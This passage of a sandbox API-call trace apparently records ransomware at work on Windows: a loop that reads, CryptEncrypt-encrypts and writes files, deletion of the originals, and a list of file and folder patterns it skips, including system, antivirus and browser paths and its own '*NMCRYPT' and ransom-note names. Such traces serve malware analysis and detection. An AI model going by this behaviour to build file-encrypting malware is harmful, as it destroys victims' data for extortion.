lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.335] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.335] GetLastError () returned 0x0 [0151.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.335] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.335] GetLastError () returned 0x0 [0151.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.335] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.335] GetLastError () returned 0x0 [0151.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.335] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.335] GetLastError () returned 0x0 [0151.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.335] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.335] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.335] GetLastError () returned 0x0 [0151.335] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.336] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.336] GetLastError () returned 0x0 [0151.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.336] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.336] GetLastError () returned 0x0 [0151.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.336] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.336] GetLastError () returned 0x0 [0151.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.336] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0151.336] GetLastError () returned 0x0 [0151.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x1624, lpBuffer=0x2901300, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0151.336] WriteFile (in: hFile=0x588, lpBuffer=0x2901300*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901300*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0151.336] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui")) returned 0x20 [0151.336] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui", dwFileAttributes=0x20) returned 0 [0151.337] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 1 [0151.337] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui")) returned 0 [0151.337] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" [0151.337] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0151.337] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC231.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc231.tmp")) returned 0xc231 [0151.338] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC231.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc231.tmp"), dwFlags=0x1) returned 0 [0151.338] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC231.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc231.tmp")) returned 1 [0151.338] CryptDestroyKey (hKey=0x9ad738) returned 1 [0151.338] wcslen (_String="OK") returned 0x2 [0151.338] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.338] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.338] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0151.338] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0151.338] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0151.338] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*NMCRYPT") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*.exe") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*.dll") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*.lnk") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*.bat") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*.ini") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*.msi") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*.scf") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*AppData*") returned 0 [0151.338] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\java\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\windows\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*Atheros*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*Realtek*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*bootmgr*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*boot*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*boot*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*IO.SYS*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*ntldr*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*chrome*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*opera*") returned 0 [0151.339] PathMatchSpecW (pszFile="InkObj.dll.mui", pszSpec="*firefox*") returned 0 [0151.339] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui", pszSpec="*") returned 1 [0151.339] strlen (_Str="NMoreira") returned 0x8 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.339] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.340] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.341] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 